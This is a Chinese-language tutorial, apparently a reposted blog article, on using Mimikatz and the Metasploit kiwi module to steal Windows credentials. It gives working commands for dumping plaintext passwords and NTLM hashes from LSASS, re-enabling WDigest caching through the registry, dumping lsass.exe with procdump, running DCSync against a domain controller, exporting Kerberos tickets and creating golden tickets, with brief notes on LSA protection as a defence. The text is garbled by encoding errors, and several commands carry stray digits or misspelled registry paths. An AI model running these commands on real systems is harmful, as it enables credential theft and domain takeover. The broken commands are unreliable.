項(xiàng)目地址:https://github.com/gentilkiwi/mimikatz/
一�����、工具簡(jiǎn)介
Mimikatz是法國(guó)人benjamin開發(fā)的一款功能強(qiáng)大的輕量級(jí)調(diào)試工具��,本意是用來(lái)個(gè)人測(cè)試�,但由于其功能強(qiáng)大����,能夠直接讀取WindowsXP-2012等操作系統(tǒng)的明文密碼而聞名于滲透測(cè)試,可以說(shuō)是滲透必備工具�。
注意:
當(dāng)目標(biāo)為win10或2012R2以上時(shí),默認(rèn)在內(nèi)存緩存中禁止保存明文密碼���,但可以通過修改注冊(cè)表的方式抓取明文�。
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f12
二����、Mimikatz命令
cls: 清屏
standard: 標(biāo)準(zhǔn)模塊,基本命令
crypto: 加密相關(guān)模塊
sekurlsa: 與證書相關(guān)的模塊
kerberos: kerberos模塊
privilege: 提權(quán)相關(guān)模塊
process: 進(jìn)程相關(guān)模塊
serivce: 服務(wù)相關(guān)模塊
lsadump: LsaDump模塊
ts: 終端服務(wù)器模塊
event: 事件模塊
misc: 雜項(xiàng)模塊
token: 令牌操作模塊
vault: Windows ��、證書模塊
minesweeper:Mine Sweeper模塊
net:
dpapi: DPAPI模塊(通過API或RAW訪問)[數(shù)據(jù)保護(hù)應(yīng)用程序編程接口]busylight: BusyLight Module
sysenv: 系統(tǒng)環(huán)境值模塊
sid: 安全標(biāo)識(shí)符模塊
iis: IIS XML配置模塊
rpc: mimikatz的RPC控制
sr98: 用于SR98設(shè)備和T5577目標(biāo)的RF模塊
rdm: RDM(830AL)器件的射頻模塊
acr: ACR模塊
version: 查看版本
exit: 退出
**提升權(quán)限 命令:privilege::debug **
mimikatz許多功能都需要管理員權(quán)限��,如果不是管理員權(quán)限不能debug
三���、示例
抓取明文密碼
在windows2012以上的系統(tǒng)不能直接獲取明文密碼了��,當(dāng)可以搭配procdump+mimikatz獲取密碼����。
mimikatz # logmimikatz # privilege::debugmimikatz # sekurlsa::logonpasswords1234
示例:windows server 2003
分析命令執(zhí)行后的內(nèi)容:
**msv:**這項(xiàng)是賬戶對(duì)應(yīng)密碼的各種加密協(xié)議的密文,可以看到有LM�、NTLM和SHA1加密的密文
**tspkg,wdigest,kerberos:**這個(gè)就是賬戶對(duì)應(yīng)的明文密碼了。有的時(shí)候這三個(gè)對(duì)應(yīng)的也不是全部都是一樣的��,需要看服務(wù)器是什么角色����。
**SSP:**是最新登錄到其他RDP終端的賬戶和密碼
模塊
sekurlsa模塊
sekurlsa::logonpasswords
抓取用戶NTLM哈希
sekurlsa::msv
加載dmp文件,并導(dǎo)出其中的明文密碼
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full
導(dǎo)出lsass.exe進(jìn)程中所有的票據(jù)
sekurlsa::tickets /export123456789101112
kerberos模塊
列出系統(tǒng)中的票據(jù)
kerberos::list
kerberos::tgt
清除系統(tǒng)中的票據(jù)
kerberos::purge
導(dǎo)入票據(jù)到系統(tǒng)中
kerberos::ptc 票據(jù)路徑12345678910
lsadump模塊
在域控上執(zhí)行)查看域kevin.com內(nèi)指定用戶root的詳細(xì)信息���,包括NTLM哈希等
lsadump::dcsync /domain:kevin.com /user:root(在域控上執(zhí)行)讀取所有域用戶的哈希
lsadump::lsa /patch
從sam.hive和system.hive文件中獲得NTLM Hash
lsadump::sam /sam:sam.hive /system:system.hive
從本地SAM文件中讀取密碼哈希
token::elevate
lsadump::sam12345678910111213
wdigest
WDigest協(xié)議是在WindowsXP中被引入的,旨在與HTTP協(xié)議一起用于身份認(rèn)證��。默認(rèn)情況下,Microsoft在多個(gè)版本的Windows(Windows XP-Windows 8.0和Windows Server 2003-Windows Server 2012)中啟用了此協(xié)議,這意味著純文本密碼存儲(chǔ)在LSASS(本地安全授權(quán)子系統(tǒng)服務(wù))進(jìn)程中�����。 Mimikatz可以與LSASS交互,允許攻擊者通過以下命令檢索這些憑據(jù)
mimikatz #privilege::debugmimikatz #sekurlsa::wdigest123
在windows2012系統(tǒng)以及以上的系統(tǒng)之后這個(gè)默認(rèn)是關(guān)閉的如果在 win2008 之前的系統(tǒng)上打了 KB2871997 補(bǔ)丁���,那么就可以去啟用或者禁用 WDigest����。Windows Server2012及以上版本默認(rèn)關(guān)閉Wdigest����,使攻擊者無(wú)法從內(nèi)存中獲取明文密碼�����。Windows Server2012以下版本���,如果安裝了KB2871997補(bǔ)丁�����,攻擊者同樣無(wú)法獲取明文密碼����。配置如下鍵值:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest1
UseLogonCredential 值設(shè)置為 0, WDigest 不把憑證緩存在內(nèi)存��;UseLogonCredential 值設(shè)置為 1, WDigest 就把憑證緩存在內(nèi)存���。
使用powershell進(jìn)行更改
開啟Wdigest Auth
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentCzontrolSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
關(guān)閉Wdigest Auth
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentCzontrolSet\Control\SecurityProvid12345
LSA保護(hù)
如何防止mimikatz獲取一些加密的密文進(jìn)行PTH攻擊呢����!其實(shí)微軟推出的補(bǔ)丁KB2871997是專門針對(duì)PTH攻擊的補(bǔ)丁,但是如果PID為500的話����,還是可以進(jìn)行PTH攻擊的!本地安全權(quán)限服務(wù)(LSASS)驗(yàn)證用戶是否進(jìn)行本地和遠(yuǎn)程登錄,并實(shí)施本地安全策略���。 Windows 8.1及更高版本的系統(tǒng)中,Microsoft為L(zhǎng)SA提供了額外的保護(hù),以防止不受信任的進(jìn)程讀取內(nèi)存或代碼注入�。Windows 8.1之前的系統(tǒng),攻擊者可以執(zhí)行Mimikatz命令來(lái)與LSA交互并檢索存儲(chǔ)在LSA內(nèi)存中的明文密碼����。
這條命令修改鍵的值為1,即使獲取了debug權(quán)限嗎����,也不能直接獲取明文密碼和hash
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 1 /f
獲取高版本W(wǎng)indows系統(tǒng)的密碼憑證
使用procdump將lsass dump下來(lái)(需要管理員權(quán)限)
procdump.exe -accepteula -ma lsass.exe 1.dmp12
使用mimikatz讀取密碼
mimikatz.exe "log" "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit12
msf中kiwi模塊
注:kiwi默認(rèn)加載32位,如果目標(biāo)系統(tǒng)位64位���,將進(jìn)程遷移到64位程序的進(jìn)程中���。
kiwi模塊使用
load kiwi //加載kiwi模塊help kiwi //查看幫助123
kiwi模塊命令
creds_all:列舉所有憑據(jù)
creds_kerberos:列舉所有kerberos憑據(jù)
creds_msv:列舉所有msv憑據(jù)
creds_ssp:列舉所有ssp憑據(jù)
creds_tspkg:列舉所有tspkg憑據(jù)
creds_wdigest:列舉所有wdigest憑據(jù)
dcsync:通過DCSync檢索用戶帳戶信息
dcsync_ntlm:通過DCSync檢索用戶帳戶NTLM散列��、SID和RID
golden_ticket_create:創(chuàng)建黃金票據(jù)
kerberos_ticket_list:列舉kerberos票據(jù)
kerberos_ticket_purge:清除kerberos票據(jù)
kerberos_ticket_use:使用kerberos票據(jù)
kiwi_cmd:執(zhí)行mimikatz的命令��,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密碼
wifi_list:列出當(dāng)前用戶的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/編碼12345678910111213141516171819
creds_all
列舉系統(tǒng)中的明文密碼
kiwi_cmd
kiwi_cmd可以使用mimikatz中的所有功能�����,命令需要接上mimikatz的命令
kikiwi_cmd sekurlsa::logonpasswords12
更多用法參考鏈接:https://www.freebuf.com/articles/web/176796.html
該文章在 2024/1/15 11:30:33 編輯過
400 186 1886
